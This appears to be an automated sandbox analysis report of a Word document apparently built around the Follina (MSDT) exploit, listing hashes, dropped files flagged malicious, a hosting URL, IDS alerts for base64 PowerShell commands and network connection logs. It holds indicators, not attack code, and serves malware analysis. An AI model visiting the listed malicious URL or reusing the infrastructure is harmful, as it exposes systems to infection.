MD5: | 63BA949A4695972C1A0E4D0BEC674841 |
SHA1: | 6002A36601A9EEE1C8B4667761AF8815D4E6D8C9 |
SHA-256: | D5D97F1310E4BFA007D830CA4E1953DF22BE1B797B27692712F5C93E6DBC43DB |
SHA-512: | 2EE603F54070AA54538FCB3F8C541437E1BFA50E3F56380801356069354940FBFCCB116591D59B25D5F435255E0820DBFCB271EF975670FC91BD03D1D7D1A39D |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Reputation: | low |
IE Cache URL: | https://dullghostwhitetwintext.karewen.repl.co/index.html |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC592AE0.emf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 10172 |
Entropy (8bit): | 3.928478624213631 |
Encrypted: | false |
SSDEEP: | 48:q373cifeyUaIWmBJOhTDOj1WN7M60iIiB7rSwVauLM/Myof9NLRgMy7k3e2kW86J:873xeXaIBckry+Ks8D+plS |
MD5: | C349F98D0BBE0D72F9A6E34335918207 |
SHA1: | B2184C336F95E1ED5F338D1B27D06A4F8E1C535F |
SHA-256: | 8ACC7CBE7BEB283D3908F418FB5390623F1EB46018F426D4911F5515E786CAA5 |
SHA-512: | A6DE09C1E4B3947EF4B8BF46B14A3E77AFFB6004EDED3560814720B8304542F1722EFEF83502E0532C76B438015B84200302BE5CE5F8C1228A881F050BE8AE5B |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5632 |
Entropy (8bit): | 2.181448160411441 |
Encrypted: | false |
SSDEEP: | 48:rMTLxD3U2557fpQ0fpQRiVDaU2557fpQAfpQFi:QTLxD3U2TenAVDaU2Ter0 |
MD5: | 4B4FEA476768A33C0BCF51BCDDB2CCD4 |
SHA1: | 80D924A68CBE3D1CAA003D7180A3FB3713A15F30 |
SHA-256: | 675CDC18EB9F7FA3C1C4287FF4C1CFADFB81B54073AF377D5082BD23B0D472CD |
SHA-512: | 20B06E268A0343D559C140BF525E4C0915EB9B5BDA33D94BC51E5B19EBEE3C725CD2E0D1BF75D34E9E4C984F32E0CA0356D85378CECD8DE1EA44ED38EEB68A24 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92861601-980D-49B7-B60E-86BDABC4A51A}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D894BCB6-25AA-45DC-81E3-B0273BF56D57}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 0.9434685449697431 |
Encrypted: | false |
SSDEEP: | 6:FlIcElClbY/z35lEHaAlPrP5llAabK/O3iuzxyn4PxZUtg:Fl7MClcFlEHaAPrzXKzut8GZz |
MD5: | 4D066506FC8303FE21BD33D70AD15382 |
SHA1: | FBEB98890B56989FBDD274982690F11DA6EF3B8E |
SHA-256: | D210EDD7CC5EEC6A9C3AD9C09B2755B8144C3A5ED44B178FE1EE3A50852E7B38 |
SHA-512: | 05B05479DE9EE50CA74A890D27634A065995D34601343F059B8B66516FAAC79098CB4F9ADABFB3ED5CA763BF67A953260FFAA36D24A3BABC04FBA22BC9541FC5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.02572382778486038 |
Encrypted: | false |
SSDEEP: | 6:I3DPcrHavxggLRxv26Lt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP2Hc/tRvYg3J/ |
MD5: | FAA9C11C3BF4749CF7FFF72F81103637 |
SHA1: | EA800893E160BDEC41C9E5A208ECDEFD93020DE4 |
SHA-256: | E4FE523DD900A6A9384D518919DC6F46F67E47BA19062D66BC33738FC9D63D7C |
SHA-512: | 89283E5CC4D45C886D88EDFF6DD6D81FFBD9DC643925411851E4EAE034BD56F8C9C60C932D6C8DE3A95DB20D06F0F0A4DBF4081CBFBAA03B174D061BA4A79A66 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025486724730822925 |
Encrypted: | false |
SSDEEP: | 6:I3DPc3vxggLReaZopSdh/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPM6H2PvYg3J/ |
MD5: | DF1D9A5116232C0278742EE1F191FF0C |
SHA1: | 0BA0ABF8406B667D8C632F6B3ED6395430A0E8D1 |
SHA-256: | E4BC1D0AA363F21236E3EDF16C6863CB44D1A3E24B12EC190B33C8F19DF493A9 |
SHA-512: | 35AE70F978C47590A32D185E04AA07C45647D8A9B42E0A1716E6AA1EE075A3F0CFF252FF1853A4C9E474C672F81DAB4022BA3AA37C5FDD1075413668015CB15B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.541555035737997 |
Encrypted: | false |
SSDEEP: | 12:8mbA80gXg/XAlCPCHaXNBQtB/XAJX+WuvWQK3juicvbTS3tb4GK/NDtZ3YilMMEh:8mb1k/XT9Sk+mNeHS3ADv3q+u7D |
MD5: | 16C92C158C9E519DF7E7171A87BA915B |
SHA1: | 5EA87A76FB2D1CB7776EE3E10902DB4D444EC686 |
SHA-256: | C3556B03AEDC5348C415F365D63B28E0DF81C86D721A2C8D1937AFDC46879F35 |
SHA-512: | BEFC41BCB397B893BFD14392992FC02FAD04AD946493E359E20DF11D3136DD145076148BA88B2BE3471D3709EA6EDC9B56EA90A02DC5F246BEE1E26F87CE183F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 72 |
Entropy (8bit): | 4.780851828270855 |
Encrypted: | false |
SSDEEP: | 3:bDuMJl+Uqe3TAlmxWtmx3TAlv:bCne3CE3W |
MD5: | 69F6516C10F77E405479AA56E74F44A0 |
SHA1: | 36194337D22DE7E093B6659C3E3A1C98A2F243CE |
SHA-256: | EFAE2CC5C7CBDFF13D4AC0A4FB3F0C0000C52A4E1C9AD499C834F0135A8ECCFB |
SHA-512: | 3443F8CF1E2804F86512DDDCEC8DF5F0F3683FA2D1E57FC4592E8A13FC7CCC9E402230D71F956DDB8D3873B6825979EB706599CB0F7B2FF32D1A993F31D9451B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.316883678675453 |
TrID: |
|
File name: | C1ZGt61uGv.docx |
File size: | 26614 |
MD5: | 98998af843c2c938c079a102abe6c73d |
SHA1: | b1a1dda90b3df0ba5f23430a6c55c48a9c3dbe9d |
SHA256: | b0cfd511498cbaed084fa622cfeb1a07de7478205cbff58cb40cb89091813593 |
SHA512: | 4b3fee7cddc41a3f742d2ca3bcc6db766e43d183b926153927ec5591d73cce2d0cf5b4ade9d0f010bf6b104f463d44e383e423984d0bf5684e58971dd0665ee7 |
SSDEEP: | 384:aW5NndAzG46H8kwV1xEw2imBTQUhGnhHpAKIQqRrINxt/ZtNNiW2+30Ony/6MY:awlO1Ew2HGHiKpqRrSxllN2+3By/e |
TLSH: | DCC2C057D12B5C75CC6A4EBCD82C8ABCEA9430D0F9151187244DE6C9B24BD73133EA1A |
File Content Preview: | PK..........!..l.$u...........[Content_Types].xml ...(......................................................................................................................................................................................................... |
Icon Hash: | e4e6a2a2a4b4b4a4 |
Document Type: | OpenXML |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Template: | |
Last Saved By: | |
Revion Number: | 2 |
Total Edit Time: | 0 |
Create Time: | 2022-06-03T10:03:00Z |
Last Saved Time: | 2022-06-03T10:03:00Z |
Number of Pages: | 1 |
Number of Words: | 3 |
Number of Characters: | 18 |
Creating Application: | |
Security: | 0 |
Number of Lines: | 1 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0000 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 76 |
Entropy: | 3.093449526469053 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 2240124 |
Entropy: | 0.005070123031127669 |
Base64 Encoded: | True |
Data ASCII: | x . " . . . N e w B i t m a p i m a g e . b m p . D : \\ S a y a a r \\ P e r s o n a l \\ C o d i n g \\ M S D T Z e r o - D a y \\ M S F o l l i n a \\ N e w B i t m a p i m a g e . b m p . . . . . ^ . . . C : \\ U s e r s \\ k a r e w \\ A p p D a t a \\ L o c a l \\ T e m p \\ { 4 9 2 A 0 5 A 6 - 0 F C E - 4 3 E 2 - A F E 7 - D D 9 A E A 8 4 F C 1 B } \\ N e w B i t m a p i m a g e . b m p . 6 , " . B M 6 , " . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . , " . . . . . . . . . . . . . . . . . |
Data Raw: | 78 2e 22 00 02 00 4e 65 77 20 42 69 74 6d 61 70 20 69 6d 61 67 65 2e 62 6d 70 00 44 3a 5c 53 61 79 61 61 72 5c 50 65 72 73 6f 6e 61 6c 5c 43 6f 64 69 6e 67 5c 4d 53 44 54 20 5a 65 72 6f 2d 44 61 79 5c 4d 53 46 6f 6c 6c 69 6e 61 5c 4e 65 77 20 42 69 74 6d 61 70 20 69 6d 61 67 65 2e 62 6d 70 00 00 00 03 00 5e 00 00 00 43 3a 5c 55 73 65 72 73 5c 6b 61 72 65 77 5c 41 70 70 44 61 74 61 |
General | |
Stream Path: | \x3EPRINT |
File Type: | Windows Enhanced Metafile (EMF) image data version 0x10000 |
Stream Size: | 10172 |
Entropy: | 3.928478624213631 |
Base64 Encoded: | False |
Data ASCII: | . . . . l . . . . . . . . . . . . . . I . . . . . . . . . . . ' . . . 9 . . . E M F . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 00 00 00 6c 00 00 00 18 00 00 00 00 00 00 00 d7 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 27 0f 00 00 39 05 00 00 20 45 4d 46 00 00 01 00 bc 27 00 00 0d 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 35 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b7 04 00 b0 a7 02 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 |
General | |
Stream Path: | \x3ObjInfo |
File Type: | data |
Stream Size: | 6 |
Entropy: | 1.2516291673878228 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . |
Data Raw: | 00 00 03 00 0d 00 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
35.186.245.55192.168.2.22443491762025010 08/18/22-04:23:24.931708 | TCP | 2025010 | ET TROJAN Powershell commands sent B64 1 | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
35.186.245.55192.168.2.22443491812025010 08/18/22-04:23:28.806682 | TCP | 2025010 | ET TROJAN Powershell commands sent B64 1 | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 18, 2022 04:23:06.193463087 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.193548918 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.193672895 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.207406998 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.207438946 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.380359888 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.380518913 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.391787052 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.391815901 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.392262936 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.392323017 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.842437029 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.883389950 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.087683916 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.087789059 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.087824106 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.090807915 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.103862047 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.103905916 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.103915930 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.103952885 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:19.050564051 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.050672054 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.050815105 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.051099062 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.051130056 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.212224960 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.212358952 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.222294092 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.222328901 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.222820044 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.245089054 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.291367054 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.499521971 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.499900103 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.499938011 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.499965906 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.499972105 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.500001907 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:23.998555899 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:23.998600960 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:23.998675108 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:23.999838114 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:23.999859095 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.163655043 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.163757086 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.169996977 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.170021057 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.170578957 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.209079981 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.255384922 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.468491077 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.468570948 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.468777895 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.469403028 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.469420910 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.496511936 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.496556044 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.496635914 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.496906042 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.496921062 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.656685114 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.656788111 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.664288998 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.664318085 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.667854071 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.667876959 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921617985 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921694994 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921843052 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.921859026 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921871901 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.921907902 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.931603909 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.931698084 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.931782007 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.931821108 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.931837082 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.932337999 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.932358980 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.210772991 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.210839987 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.210918903 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.211433887 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.211458921 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.373008013 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.373100042 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.381207943 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.381238937 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.384861946 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.384892941 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.612524986 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.612626076 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.612701893 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.612737894 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.614072084 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.614108086 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
